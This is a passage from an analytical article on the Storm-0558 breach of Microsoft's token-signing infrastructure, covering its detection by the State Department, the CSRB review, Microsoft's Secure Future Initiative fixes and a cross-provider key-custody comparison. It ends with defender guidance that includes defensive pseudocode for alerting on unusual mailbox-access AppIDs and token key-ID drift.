The structural fact about this detection -- the one that puts every other event in this article in its proper context -- is that MailItemsAccessed was, pre-incident, a Purview Audit (Premium) tier feature [@aa23-193a]. The State Department had paid for Premium. Most federal civilian agencies and many commercial tenants had not. If the State Department had been on Purview Audit (Standard), the event class that surfaced Storm-0558 would not have been collected at all, and the breach would have run longer and gone wider before anyone noticed. The CSRB report makes this connection explicit: the structural critique that follows in Section 6 is not about one bug or one missing check. It is about the commercial logging-tier structure of cloud identity, and about who is in a position to detect a CSP-level compromise when the CSP itself is not [@csrb-report-2024].

Note: The cloud provider did not catch the breach. A paying customer did, on routine threat-hunting against an audit log the customer had to pay extra to collect. This is the CSRB's harshest single critique, and it is what motivated Microsoft's policy response on July 19, 2023 -- making key Purview Audit (Premium) features, including MailItemsAccessed, free for FCEB customers and most commercial customers [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed; @csrb-report-2024].

The detection methodology the State Department used is reproducible in pseudocode. The logic, after audit-log ingestion into a SIEM, is small.

{` // Pseudocode. Assumes MailItemsAccessed events ingested from M365 Purview audit log. // The State Department's pattern: maintain a small allowlist of legitimate AppIDs.

const allowlistedAppIds = new Set([ // populated from your tenant's historical baseline of legitimate mail clients, // approved third-party connectors, M365 services, and authorized integrations '00000003-0000-0000-c000-000000000000', // Microsoft Graph // ... extend with your tenant's specific approved AppIDs ]);

function analyzeEvent(evt) { if (evt.Operation !== 'MailItemsAccessed') return; if (allowlistedAppIds.has(evt.AppId)) return;

// Forged-token sessions necessarily present an AppID outside the baseline. alert({ severity: 'high', reason: 'MailItemsAccessed from unallowlisted AppID', user: evt.UserId, appId: evt.AppId, clientAppId: evt.ClientAppId, sourceIp: evt.ClientIPAddress, messageId: evt.InternetMessageId }); } `}

The State Department SOC analyst who first identified Storm-0558 has not been publicly named in any primary source. The CSRB report describes the detection at the level of the agency. There is good reason for the anonymity, given the operational profile of someone who is, by chance and skill, the first known human to detect a Chinese state-affiliated forgery of a Microsoft signing key.

Microsoft's policy response was rapid and substantive. On July 19, 2023, the Microsoft Security blog announced the expansion. Purview Audit (Standard) customers would get "more than 30 other types of log data previously only available at the Microsoft Purview Audit (Premium) subscription level," with default retention extended from 90 to 180 days, rolling out beginning September 2023 [@ms-blog-jul19-recovered]. CISA's same-day press release confirmed: "Microsoft customers will now have access to expanded cloud logging capabilities at no additional charge ... these additional logging capabilities will now be available at no extra cost to federal government customers and Microsoft commercial customers beginning in September" [@cisa-statement-free-logs-fixed].

The pricing structure that had made the State Department's detection possible only because the State Department paid extra was, eight days after the joint advisory, made part of the baseline.

That is the operational story. But the political story was just starting. On July 27, 2023, Senator Ron Wyden (D-OR) wrote a four-page letter to three federal agencies asking them to investigate Microsoft. Fifteen days later, the Cyber Safety Review Board announced its third-ever review.

6. The Public Reckoning -- CSRB, Retracted Hypothesis, Congressional Testimony

Senator Wyden's letter, addressed to Attorney General Merrick Garland, FTC Chair Lina Khan, and CISA Director Jen Easterly, opened with a comparison: "Microsoft never took responsibility for its role in the SolarWinds hacking campaign" [@wyden-senate-pr; @wyden-senate-letter-pdf]. The letter then enumerated four specific cybersecurity failures it attributed to Microsoft in the Storm-0558 incident.

Quoting Wyden's own characterization from the Senate press release: "Employing a single encryption key that could be used to forge access to consumer, commercial and government customers' private communications; Microsoft's blog post about the hack suggests it did not store high-value encryption keys in a Hardware Security Module ...; Using an encryption key that was valid for 5 years, and was still accepted by Microsoft's software, even though it had expired in 2021, two years before the hack ...; Neither internal nor external security audits detected the security weaknesses that enabled the hack" [@wyden-senate-pr].

The (d) to (e) jump in the political chronology -- from Wyden's July 27 letter to the August 11 DHS announcement -- is, in Wyden's own words, causal. His August 11 statement reads: "I applaud President Biden and CISA Director Easterly for acting on my request for the board to review this recent espionage campaign, including cybersecurity negligence by Microsoft that enabled it ... Had the board studied the 2020 SolarWinds hack, as President Biden originally directed, its findings might have been able to shore up federal cybersecurity in time to stop hackers from exploiting a similar vulnerability in the most recent incident" [@wyden-senate-statement-aug11]. The Senate office's published causal-chain framing matters because it provides the public-record bridge from a single senator's letter to a federal advisory-board review.

6.1 The CSRB's authority and process

The Cyber Safety Review Board exists because President Biden's Executive Order 14028 of May 12, 2021, "Improving the Nation's Cybersecurity," directed DHS to establish a standing board to conduct after-action reviews of significant cyber incidents [@eo-14028]. Storm-0558 was the Board's third review, after Log4j and Lapsus$ [@csrb-program].

On August 11, 2023, DHS Secretary Alejandro Mayorkas announced the Board would conduct a review of "the malicious targeting of cloud computing environments," with the recent Microsoft Exchange Online intrusion as the central case study and a broader scope covering "issues relating to cloud-based identity and authentication infrastructure affecting applicable CSPs and their customers" [@dhs-csrb-announce-archive]. Robert Silvers, DHS Under Secretary for Policy, chaired. Dmitri Alperovitch served as Acting Deputy Chair for this review [@dhs-csrb-report-release].

A public-private federal advisory board established by Executive Order 14028 (May 12, 2021) and standing up in February 2022 to conduct after-action reviews of significant cyber incidents and recommend improvements. The Board's Storm-0558 review, its third (after Log4j and Lapsus$), was announced August 11, 2023 and reported April 2, 2024 [@eo-14028; @csrb-program; @csrb-report-2024].

6.2 The September 2023 hypothesis and the March 2024 retraction

The chronology that matters here is short and worth pinning down precisely. Microsoft published the crash-dump hypothesis on September 6, 2023 [@msrc-key-acquisition]. Microsoft itself updated that post on March 12, 2024 with the retraction-of-the-artifact paragraph quoted earlier in Section 4.1 [@msrc-key-acquisition]. The CSRB report published April 2, 2024 -- three weeks after Microsoft retracted the artifact -- then documented the resulting state of knowledge (verdict quoted in Section 4.1; CSRB page 17) [@csrb-report-2024].

The order matters. Microsoft retracted the artifact first. The CSRB did not force the retraction; it documented the resulting state of knowledge. That sequence is meaningful because it suggests Microsoft's own forensic work, not external pressure, drove the walking-back of the artifact claim.

6.3 The CSRB's findings

The Board's findings, in its own verbatim language, are direct. The Board's page-ii verbatim -- the preventable / inadequate / requires-an-overhaul language quoted in Section 1's opening PullQuote -- sets the frame; page 17 sharpens it: "the cascade of Microsoft's avoidable errors that allowed this intrusion to succeed" [@csrb-report-2024].

The DHS press release surfaced these findings on the day of publication: "the intrusion by Storm-0558, a hacking group assessed to be affiliated with the People's Republic of China, was preventable. It identified a series of Microsoft operational and strategic decisions that collectively pointed to a corporate culture that deprioritized enterprise security investments and rigorous risk management" [@dhs-csrb-report-release].

The report makes 25 recommendations. Of those, 16 apply to Microsoft (4 specific to Microsoft and 12 to all cloud service providers but accepted by Microsoft per Brad Smith's June 2024 testimony) [@brad-smith-2024-06-13]. The structural critique embedded in the recommendations is that the commercial logging-tier structure of cloud identity is itself a security problem, because it delays detection asymmetrically: richly-resourced customers detect compromise; less-resourced customers do not. The free-Purview-Audit shift Microsoft had announced on July 19, 2023 is, in the CSRB's framing, a necessary but not sufficient condition for cloud-identity log access to stop being a per-customer commercial decision.

6.4 Brad Smith's June 13, 2024 testimony

The House Committee on Homeland Security titled its June 13, 2024 hearing "A Cascade of Security Failures: Assessing Microsoft Corporation's Cybersecurity Shortfalls and the Implications for Homeland Security" [@homeland-hearing]. The plural "Failures" was a deliberate framing choice. By the time of the hearing, Microsoft had also publicly disclosed a separate January 2024 intrusion by Midnight Blizzard (the Russian SVR; the same actor as SolarWinds), and the hearing's scope spanned both incidents. Brad Smith, Microsoft's Vice Chair and President, was the witness.

Smith's written and oral testimony opened with the soundbite that defined the hearing's coverage (quoted in the PullQuote below). Smith confirmed Microsoft's acceptance of all 16 applicable CSRB recommendations, identified 18 additional internal objectives beyond the CSRB's scope, and announced that Senior Leadership Team compensation would be tied in part to progress on the Secure Future Initiative [@brad-smith-2024-06-13; @sfi-may-2024].

Microsoft accepts responsibility for each and every one of the issues cited in the CSRB's report. Without equivocation or hesitation. And without any sense of defensiveness. -- Brad Smith, Vice Chair and President of Microsoft, written testimony to the House Committee on Homeland Security, June 13, 2024 [@brad-smith-2024-06-13; @smith-testimony-pdf]

The hearing's plural framing -- "Failures" -- mattered. On January 19, 2024, Microsoft disclosed a separate Midnight Blizzard intrusion that had begun in late November 2023 (approximately four weeks after the November 2, 2023 launch of the Secure Future Initiative) via a password spray against a legacy non-production test tenant, and that exfiltrated email from members of Microsoft's senior leadership team [@msrc-midnight-blizzard-jan-archive]. The March 8, 2024 update added that Midnight Blizzard had reached Microsoft source code repositories and ramped February password sprays to ten times the January volume [@msrc-midnight-blizzard-mar-archive]. By the June hearing, Microsoft was carrying both incidents into the same line of questioning.

Microsoft accepted responsibility. The CSRB asked for an architectural overhaul. The next question is what Microsoft actually built.

7. The Architectural Response -- SFI and the Identity-Plane Re-Architecture

The Secure Future Initiative (SFI) is the corporate vehicle through which Microsoft's post-Storm-0558 architectural changes are reported. The remarkable property of the SFI commitments, viewed against the pre-incident architecture described in Section 3, is that they are surgically targeted: each of the four ways the pre-incident MSA system failed maps to one explicit commitment.

7.1 SFI: launch, expansion, motivation arc

Brad Smith launched SFI on November 2, 2023, with three pillars focused on AI-based cyber defenses, fundamental software engineering advances, and stronger international cyber norms [@sfi-launch-nov-2023]. Charlie Bell expanded it on May 3, 2024 into six pillars: protect identities and secrets; protect tenants and isolate production systems; protect networks; protect engineering systems; monitor and detect threats; accelerate response and remediation [@sfi-may-2024].

Pillar 1's verbatim commitment is the one that maps onto Storm-0558 most directly: "Protect identity infrastructure signing and platform keys with rapid and automatic rotation with hardware storage and protection (for example, hardware security module (HSM) and confidential compute)" and "Adopt more fine-grained partitioning of identity signing keys and platform keys" [@sfi-may-2024].

The motivation arc Smith described in his June 13, 2024 testimony connects the dots. Storm-0558 led to the November 2023 launch. The January 2024 Midnight Blizzard intrusion led to the May 2024 six-pillar expansion. The April 2024 CSRB report led to the integration of CSRB recommendations into SFI. The June 2024 hearing led to SLT compensation being tied to SFI progress [@brad-smith-2024-06-13; @sfi-may-2024].

A multi-year Microsoft corporate program announced November 2, 2023 by Brad Smith, expanded May 3, 2024 by Charlie Bell into six pillars, and reported on quarterly. SFI is the explicit corporate vehicle through which Microsoft commits to and reports progress on the architectural changes recommended by the CSRB after Storm-0558. Its identity-and-secrets pillar names HSM custody, automatic rotation, fine-grained key partitioning, and confidential-compute hosting of signing operations as concrete deliverables [@sfi-launch-nov-2023; @sfi-may-2024].

7.2 HSM-bound key custody plus automatic rotation

This closes the first two ways the pre-incident architecture failed: the software-stored key and the unrotated seven-year-old key. Microsoft's September 2024 SFI progress report's verbatim claim: "We completed updates to Microsoft Entra ID and Microsoft Account (MSA) for our public and United States government clouds to generate, store, and automatically rotate access token signing keys using the Azure Managed Hardware Security Module (HSM) service" [@sfi-sept-2024].

Azure Managed HSM is FIPS 140-3 Level 3, built on the Marvell LiquidSecurity platform, with a multi-partition topology that allows per-tenant key isolation [@azure-managed-hsm].

A tamper-resistant cryptographic device that generates and stores private keys inside a hardware boundary and exposes only signing or decryption operations to its caller. Keys generated inside an HSM cannot be exported -- the device performs the signature itself, returning only the signed output. NIST FIPS 140-3 (published March 22, 2019) defines the certification regime; Level 3 adds tamper-detection and identity-based authentication requirements [@fips-140-3; @azure-managed-hsm].

A separate Microsoft on-server primitive, Azure Integrated HSM, is explicitly framed as a Storm-0558 mitigation. Its overview page reads: "Reduce network round-trips to Azure Key Vault or Managed HSM by performing cryptographic operations locally on the same node as the Virtual Machine ... Protect against memory and crash-dump attacks" within "a FIPS 140-3 Level 3 HSM boundary" on AMD D Series v7 and AMD E Series v7 servers [@azure-integrated-hsm].

The phrase "memory and crash-dump attacks" in the same paragraph as "FIPS 140-3 Level 3" is, in context, an explicit acknowledgement of the threat model Storm-0558 spent eighteen months making famous.

7.3 Signing operations inside Confidential Computing TEEs

This closes the residual that HSM custody alone leaves open: in-use observation by a privileged host operator or administrator. The HSM keeps the key from being extracted at rest. But the signing service that asks the HSM to produce a signature still runs somewhere, in some virtual machine, on a host with operators. Confidential Computing closes that gap by running the signing service inside a Trusted Execution Environment whose memory and CPU state are encrypted with hardware-derived keys that not even the host operator can inspect.

Microsoft's April 2025 SFI report is direct about the change: "we've applied new defense-in-depth protections in response to our Red Team research and assessments, migrated the MSA signing service to Azure confidential VMs, and are migrating Entra ID signing service to the same. Each of these improvements help mitigate the attack vectors that we suspect the actor used in the 2023 Storm-0558 attack on Microsoft" [@sfi-april-2025]. The underlying TEE primitives are AMD SEV-SNP and Intel TDX, implemented in Azure's DCasv5/ECasv5 and DCesv6/ECesv6 confidential-VM SKU families [@azure-conf-compute]. The April 2025 timing was contemporaneous coverage: The Hacker News reported on the same April 21, 2025 progress post the day after [@hackernews-msa-confcompute].

A class of hardware-backed isolation primitives in which a virtual machine's memory and CPU state are encrypted with keys derived from the CPU itself, so that even a privileged host operator with full hypervisor access cannot read the workload's memory in cleartext. AMD's implementation is SEV-SNP (Secure Encrypted Virtualization, Secure Nested Paging); Intel's is TDX (Trust Domain Extensions). Azure exposes both through its DCasv5/ECasv5 and DCesv6/ECesv6 confidential-VM SKU families [@azure-conf-compute].

7.4 Tenant-issuer separation enforced in hardened validation libraries

This closes the third pre-incident failure mode: the cross-tier validation flaw. RFC 8725 Sections 3.8 and 3.9 are the canonical IETF Best Current Practice for the combined iss/aud mandate and have been since February 2020 (Section 3.8 covers issuer and subject; Section 3.9 covers audience) [@rfc-8725; @rfc-8725-html].

The Microsoft-internal response was to consolidate JWT validation across services into a single hardened SDK that enforces the iss/aud check at the library level rather than leaving it to each caller. The quantified rollout numbers from successive SFI progress reports are concrete: "more than 73% of tokens issued by Microsoft Entra ID for Microsoft owned applications" were under hardened-SDK validation by September 2024 [@sfi-sept-2024], rising to "90% of identity tokens from Microsoft Entra ID for Microsoft apps are validated by one consistent and hardened identity Software Development Kit (SDK)" by April 2025 [@sfi-april-2025].

7.5 Logging as a commodity, not a premium

This closes the fourth failure mode: the paid-tier-only audit logging that delayed customer detection. The July 19, 2023 announcement made MailItemsAccessed and 30+ other event classes free for FCEB and most commercial customers [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed].

The April 2025 SFI report added a further commitment: "two years of internal security-log retention" [@sfi-april-2025]. This addresses the secondary issue that even when logs are collected, retention windows must outlast typical adversary dwell times.

The four failure modes map to four commitments. Table form makes the alignment unambiguous.

Pre-incident failure mode (Section 3)	SFI commitment that closes it	Source
Software-resident, never-rotated 2016 MSA signing key	Azure Managed HSM custody with automatic rotation for MSA and Entra ID (September 2024)	[@sfi-sept-2024; @azure-managed-hsm]
Privileged host-side observation of in-use signing operations	MSA signing service in Azure Confidential VMs (April 2025); Entra ID signing service in migration	[@sfi-april-2025; @azure-conf-compute]
Cross-tier validation: OWA/Exchange Online did not enforce iss/aud	Hardened identity SDK validating 90% of Entra ID tokens for Microsoft apps (April 2025)	[@sfi-april-2025; @rfc-8725]
Paid-tier-only audit logging delayed customer detection	Free MailItemsAccessed and 30+ event classes from September 2023; 180-day default retention; 2-year internal retention (April 2025)	[@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed; @sfi-april-2025]

Key idea: Each defensive generation in Microsoft's Secure Future Initiative targets exactly one of the four ways the pre-incident MSA architecture failed. The chain is correctable, not just remediable: Microsoft can name which commitment closes which failure mode. What it still cannot name is how the 2016 key itself was stolen.

flowchart TD A["Token request from MSA-authenticated client"] --> B["MSA signing service in Azure Confidential VM
(SEV-SNP or TDX)"] B --> C["Attestation document from Confidential VM"] C --> D["Azure Managed HSM
(FIPS 140-3 Level 3)"] D -->|"sign with MSA key, rotated automatically"| B B --> E["Signed token to relying party"] E --> F["Hardened identity SDK validates iss, aud, kid, tenant"] F --> G["Resource access granted"]

The architectural response addresses each of the four failure modes one-for-one. But how does this stack against what other major cloud providers publicly document?

8. How Other Cloud Providers Custody Signing Keys

The Storm-0558 attack class is generic. Any identity provider that signs tokens can in principle have its signing key stolen. The honest cross-provider comparison is therefore not "which provider is most secure" -- the public evidence does not support a defensible ranking. It is instead "which architectural property each provider publicly attests to having" for the keys behind its own production identity tokens.

The asymmetry of the table below is itself informative. Microsoft, after Storm-0558, has the most explicit public commitments precisely because it had the most public incident.

Property	Microsoft (post-SFI)	AWS (IAM Identity Center, Cognito)	Google (Workspace, Cloud Identity)	Okta
HSM custody for production IdP signing keys	Yes -- Azure Managed HSM, FIPS 140-3 Level 3 [@sfi-sept-2024; @azure-managed-hsm]	Not publicly disclosed for IdP keys; CloudHSM is a customer primitive [@aws-cloudhsm; @aws-iam-idc-security]	Not publicly disclosed for IdP keys; Cloud HSM is a customer primitive [@gcp-cloud-hsm]	Not publicly disclosed at this granularity
Confidential Compute for signing operations	Yes -- MSA on Azure Confidential VMs (Apr 2025); Entra ID in migration [@sfi-april-2025; @azure-conf-compute]	Nitro Enclaves available as customer primitive; not publicly disclosed for IdP keys [@aws-nitro-enclaves; @aws-nitro-whitepaper]	Confidential Computing available as customer primitive; not publicly disclosed for IdP keys [@gcp-confidential-computing]	Not publicly disclosed
Automatic rotation of IdP signing keys	Yes -- MSA and Entra ID automatic rotation in Azure Managed HSM [@sfi-sept-2024]	AWS KMS default 365-day rotation for KMS keys; IdP rotation cadence not publicly disclosed [@aws-kms-rotation]	Cloud KMS rotation customer-controllable; Google-owned-and-managed model is opaque to customers [@gcp-cloud-hsm]; Workspace SAML cert rotation is admin-driven [@gcp-workspace-saml-cert-fixed]	Not publicly disclosed
Tenant/issuer separation enforced in SDK	Hardened identity SDK validating 90% of Entra ID Microsoft-app tokens (Apr 2025) [@sfi-april-2025; @rfc-8725]	aws-jwt-verify library enforces iss/aud for Cognito tokens [@aws-jwt-verify; @aws-cognito-jwt]	Tink library architecture supports key-set discipline [@gcp-tink]	Not publicly disclosed
Free customer audit logging	MailItemsAccessed plus 30+ event classes free since Sep 2023; 2-year internal retention [@ms-blog-jul19-recovered; @sfi-april-2025]	Standard CloudTrail; per-service audit varies	Workspace audit log; Cloud Audit Logs	System Log; baseline included
Public IdP-signing-key-class incident disclosure	Yes -- Storm-0558 (Jul 2023) and CSRB report (Apr 2024) [@csrb-report-2024]	None in 2023-2026 security bulletins surveyed [@aws-security-bulletins]	None in 2023-2026 security bulletins surveyed [@gcp-security-bulletins]	October 2023 support-system breach; HAR-file session tokens; no IdP-signing-key compromise [@okta-rca-nov3; @okta-recommended-actions]
Customer detected before vendor notified	Yes -- State Department detected Jun 15, 2023, notified Microsoft Jun 16, 2023 [@csrb-report-2024]	--	--	Yes -- Cloudflare detected Oct 18, 2023, contacted Okta before vendor notification [@cloudflare-okta-oct2023]

The right reading of the empty cells in this table is not "AWS and Google are safer than Microsoft." It is "AWS and Google have not publicly disclosed an incident that would force this level of architectural commitment, so we do not know." The Wiz Research framing applies cross-provider: "if a signing key for Google, Facebook, Okta or any other major identity provider leaks, the implications are hard to comprehend" [@wiz-storm0558]. Absence of public disclosure is not absence of risk; it is absence of forced disclosure. Microsoft's transparency, post-CSRB, is the comparison standard not because Microsoft is uniquely vulnerable but because Microsoft has uniquely published.

The Okta October 2023 incident is worth knowing about as a cross-vendor data point precisely because of the structural parallel. On October 18, 2023, Cloudflare detected attacker activity that traced back to Okta and contacted Okta before Okta had notified Cloudflare. BeyondTrust had notified Okta on October 2; the attacker still had access until October 18. Okta's November 3 RCA traced the root cause to a service-account credential stored in an Okta employee's personal Google account [@okta-rca-nov3; @okta-recommended-actions; @cloudflare-okta-oct2023]. Different attack class (support-system access, HAR-file session tokens, not IdP signing keys), but the same vendor-detected-by-customer detection inversion the Storm-0558 story made famous.

For a CISO evaluating any IdP vendor, the four operational questions mapped to the four pre-incident failure modes in Section 3 give a structured RFP. Where is the signing key custodied, and what FIPS certification does the HSM hold? What is the rotation cadence, and is rotation automated? Does the vendor's validation SDK enforce iss/aud separation by default, or does it leave the check to the caller? What audit log events are available to free-tier customers, with what retention?

CSA's Cloud Controls Matrix (CEK and IAM domains) and FedRAMP High SC-12 and IA-5 controls together cover most of these in standardized form, but the CAIQ answers are vendor-self-attested [@csa-ccm; @fedramp].

9. Theoretical Limits

There is one place where the architectural improvements of Section 7 stop. The Storm-0558 threat class lives downstream of a cryptographic identity, and there are limits cryptography itself imposes on what any architecture can do.

9.1 The core asymmetry

Under the standard cryptographic security notion of existential unforgeability under chosen-message attack -- EUF-CMA, first formalized by Goldwasser, Micali, and Rivest in 1988 [@goldwasser-micali-rivest-1988] -- a signature produced by a private signing key sk on a message m is, to any holder of the corresponding verification key vk, indistinguishable from one produced by the legitimate signer. This is not a deployment weakness. It is the definition of "signature." If the verifier could distinguish, the scheme would fail the security property. Formally [@goldwasser-micali-rivest-1988; @boneh-shoup-acc]:

$$\text{EUF-CMA: } \forall \text{ PPT adversary } \mathcal{A}, ; \Pr[\mathcal{A}^{\text{Sign}{sk}(\cdot)}(vk) \to (m^, \sigma^) \text{ with } \text{Vrfy}{vk}(m^, \sigma^) = 1 \land m^* \notin Q] \leq \text{negl}(\lambda)$$

where $Q$ is the set of messages the adversary queried to the signing oracle. The adversary's only path to forging a verifying signature on a fresh message is to learn sk. Once it has sk, every signature it produces is, by construction, valid.

EUF-CMA, *existential unforgeability under chosen-message attack*, is the standard security definition for digital signature schemes. The notion was formalized by Goldwasser, Micali, and Rivest in their 1988 *SIAM Journal on Computing* paper "A Digital Signature Scheme Secure Against Adaptive Chosen-Message Attacks" [@goldwasser-micali-rivest-1988]; the canonical modern openly-accessible textbook treatment is Boneh-Shoup's *A Graduate Course in Applied Cryptography*, Chapter 13, which presents the game-based definition used throughout this section [@boneh-shoup-acc]. Informally: an adversary with access to a signing oracle cannot produce a valid signature on a message it has not previously queried, except with negligible probability. The stronger sibling, sEUF-CMA (strong EUF-CMA), additionally forbids producing a new signature on a *previously-queried* message. Both notions imply that, once the private signing key is leaked, the legitimate signer can no longer be distinguished from the holder of the key by any signature-verifying party. This is what makes signing-key theft so consequential -- and is precisely the assumption that the relying-party-side `iss`/`aud` enforcement of RFC 8725 Sections 3.8 and 3.9 is designed to compensate for when validation, not cryptography, is the only remaining line of defense [@rfc-8725].

The consequence for defenders is that all defensive advantage against signing-key-forgery attacks lives outside cryptographic verification. The seven methods catalogued in Section 7 -- HSM custody, Confidential Compute, automatic rotation, tenant/issuer separation, free audit logging, customer-verifiable attestation (mostly absent at major-CSP scale), and detection by kid/issuer drift -- are exhaustive over the four levers a defender has against a key whose theft is, after the fact, indistinguishable from legitimate use.

9.2 The CSP-monoculture residual

When the identity provider is a multi-tenant cloud service provider, the customer cannot independently audit the provider's key custody. The customer can demand SOC 2 attestations, ISO certifications, and CSA CAIQ answers. Each of these is vendor-self-attested. None is a per-operation cryptographic proof that the signing key the provider used to sign a given token is the one custodied as advertised.

Customer-side prevention of a CSP-side custody failure is impossible by construction. Customer-side detection (the methods in Section 11) is possible. The CSRB called this systemic risk out explicitly in its discussion of cloud-identity infrastructure [@csrb-report-2024].

Key idea: Customer-side prevention of a CSP-side custody failure is impossible by construction. Customer-side detection is possible. Prevention sits entirely on the CSP side. This is the asymmetry the Storm-0558 incident made visible.

9.3 The Microsoft-as-Storm-0558-victim recursion

There is a recursive aspect to Microsoft's position that is worth naming honestly. Microsoft sells controls -- HSM custody, Confidential Compute, hardened SDKs, audit logging -- intended to defend against the attack class Microsoft itself was the highest-profile victim of. Brad Smith's "without equivocation" framing acknowledged the recursion implicitly. The CSRB's framing was harsher: a corporate culture that "deprioritized enterprise security investments and rigorous risk management" was, in the Board's view, what allowed the recursion to obtain [@csrb-report-2024; @dhs-csrb-report-release].

9.4 The upper bound

The aggregate of HSM custody, Confidential Computing, automatic rotation, and tenant/issuer separation raises the attacker's required compromise from "find a key in a debugging artifact" to "simultaneously compromise the Confidential VM build pipeline, do so within the rotation window, and bypass the HSM access control or extract a per-key signing oracle." Each is individually possible. Jointly they are several orders of magnitude harder than the pre-Storm-0558 baseline. This is not a theoretical proof of security; it is empirical defense in depth.

Imagine the cleanest possible customer-side defense. The customer subscribes only to providers that publish FIPS 140-3 Level 3 certifications, audit reports, and CAIQ answers. The customer pins acceptable issuers in their relying-party validators. The customer monitors for `kid` drift in tokens. Each of these reduces the *detection* latency for a CSP-side compromise. None of them reduces the *probability* that the CSP's signing key gets stolen tomorrow. Probability reduction at the source sits entirely on the CSP side, because the signing key by construction lives there.

Defense in depth defeats plausible paths. Whether it defeats the actual path is unknown -- because, three years on, the actual path is still unknown.

10. Open Problems

Six open problems remain after three years, in descending order of architectural consequence.

OP1 -- The mechanism gap. Microsoft still does not publicly know how the 2016 MSA signing key was stolen. The methods of Section 7 defeat plausible paths, but the actual path is undocumented. Until the actual mechanism is recovered (if it ever is), Microsoft is in the position of having raised the bar against the categories of attack it suspects, without being able to confirm that the bar it raised is the one the attacker cleared [@csrb-report-2024; @msrc-key-acquisition].

OP2 -- The broader-blast-radius question. Wiz Research showed the same key could in principle have signed tokens for SharePoint, Teams, OneDrive, and many third-party "Sign in with Microsoft" applications. Whether the broader scope was exploited and went undetected against telemetry that never existed is unanswered [@wiz-storm0558].

OP3 -- CSP regulation as critical infrastructure. The CSRB report framed cloud-identity-provider regulation as an open U.S. policy question. The Board recommended treating identity infrastructure as critical infrastructure subject to mandatory disclosure and minimum security baselines. Implementation across Congress, the executive branch, and sector-specific regulators is incomplete [@csrb-report-2024].

OP4 -- Cross-provider unrotated-signing-key risk. No major non-Microsoft IdP publicly discloses signing-key rotation cadence for its production tokens. Microsoft's transparency post-CSRB is, at present, the publication standard; AWS's, Google's, and Okta's positions are inferred from product documentation rather than disclosed in the form Microsoft now uses [@aws-iam-idc-security; @gcp-cloud-hsm].

OP5 -- Threshold or multi-party signing for production IdP signing keys. Practical cryptographic protocols exist. The canonical Schnorr-class construction is FROST -- "Flexible Round-Optimized Schnorr Threshold Signatures" -- introduced by Chelsea Komlo and Ian Goldberg at SAC 2020 [@frost-springer-sac-2020] and standardized as IRTF/CFRG RFC 9591 in June 2024 (a two-round protocol with five normative ciphersuites covering Ed25519, ristretto255, Ed448, P-256, and secp256k1) [@rfc-9591-frost].

For ECDSA, Yehuda Lindell and Ariel Nof's CCS 2018 paper described what its abstract called "the first truly practical full threshold ECDSA signing protocol that has both fast signing and fast key distribution" [@lindell-nof-cris]. The DKLs line (Doerner, Kondi, Lee, shelat) extended the work, with the May 2023 update "Threshold ECDSA in Three Rounds" the current standard reference, accompanied by named third-party production implementations from Coinbase, Silence Laboratories, Taurus Group, and BlockDaemon [@dkls-info].

No major cloud service provider has publicly deployed threshold signing for production IdP keys at the scale where compromise of a single signing oracle still ends the conversation. This is the largest unrealized research-to-practice gap in the entire stack.

OP6 -- Customer-verifiable attestation of IdP key custody. No standardized cryptographic primitive analogous to Certificate Transparency exists for IdP signing-key state. The design pattern was specified by Ben Laurie, Adam Langley, and Emilia Kasper (all of Google) in RFC 6962 in June 2013 -- a Merkle-tree-backed append-only log of TLS certificate issuance that lets any customer cryptographically detect that a certificate authority issued a certificate for their domain that they did not request [@rfc-6962-ct]. There is no equivalent primitive that lets a customer cryptographically detect that a token issuer signed a token naming them as sub that they (or their identity provider) did not request. This is the architectural ceiling of customer-side defense.

OP5 and OP6 both have rich primary-source literatures the article only gestures at. For OP5, follow the original FROST paper [@frost-springer-sac-2020] for the security proof reducing to discrete log via the Bellare-Neven Generalized Forking Lemma, the corresponding IRTF specification [@rfc-9591-frost] for the deployable ciphersuites, Lindell-Nof's CCS 2018 paper [@lindell-nof-cris] for the threshold-ECDSA foundation, and the DKLs project page [@dkls-info] for the most recent three-round construction. For OP6, RFC 6962 [@rfc-6962-ct] specifies the Merkle-tree-backed append-only log structure (the Signed Certificate Timestamp, the Merkle Audit Path, and the Merkle Consistency Proof) that any future IdP-key-custody-transparency protocol would build on.

Note: OP1, OP5, and OP6 are research-grade open questions in cryptographic systems design. OP2, OP3, and OP4 are policy and disclosure questions, addressable through regulation or industry-coordinated transparency norms. None has a published, deployed answer.

Three research-grade gaps, three policy-grade gaps. The defender, meanwhile, has to ship something on Monday. What should that something be?

11. What a Defender Should Do Today

The practical guidance splits along three audiences: M365 customers operating the consumer side of this incident's geometry, builders of multi-tenant SaaS that signs JWTs of their own, and CISOs evaluating cloud identity vendors.

11.1 For Microsoft 365 customers

First, confirm Purview Audit is enabled at the highest tier your SKU permits, that MailItemsAccessed is being collected, and that the events are being forwarded to a SIEM with retention of at least 180 days. The features previously gated on Premium have been free for FCEB and most commercial customers since the September 2023 rollout [@ms-blog-jul19-recovered; @cisa-statement-free-logs-fixed].

Second, maintain an inventory of legitimate (AppID, ClientAppID) pairs that historically read mailboxes in your tenant, and alert on any deviation. The State Department detection is reproducible only if you have collected the events to detect with.

Note: 1. Purview Audit at the highest tier your SKU permits, with MailItemsAccessed collection enabled. 2. SIEM forwarding with at least 180 days of retention (Microsoft's new default), preferably longer. 3. A maintained baseline of legitimate (AppID, ClientAppID) pairs for mailbox access. 4. Alerts on cross-issuer use (an enterprise resource accessed by a token from a consumer or unexpected iss). 5. Routine threat-hunting against MailItemsAccessed events filtered by anomalous source IPs, working-hours patterns, and bulk-fetch behavior consistent with exfiltration [@aa23-193a].

A baseline-deviation rule, expressed compactly:

{` // Pseudocode. Run against ingested JWT validation events from your SIEM. // 'observedKids' is the set of kid values your relying parties have processed. // 'currentJwksKids' is fetched live from the issuer's JWKS endpoint.

async function checkKidDrift(issuer, observedKids) { const jwks = await fetch(issuer + '/.well-known/openid-configuration') .then(r => r.json()) .then(cfg => fetch(cfg.jwks_uri)) .then(r => r.json());

const currentKids = new Set(jwks.keys.map(k => k.kid));

for (const kid of observedKids) { if (!currentKids.has(kid)) { alert({ severity: 'medium', reason: 'kid not in current issuer JWKS', issuer, kid, note: 'Either an expired/retired key being replayed, or a forged token signed by a kid the issuer no longer publishes. Both warrant investigation.' }); } } } `}

11.2 For builders of multi-tenant SaaS that signs JWTs

If you sign JWTs yourself, you are operating an identity provider, and the Storm-0558 lessons apply to you directly. The checklist is six items.

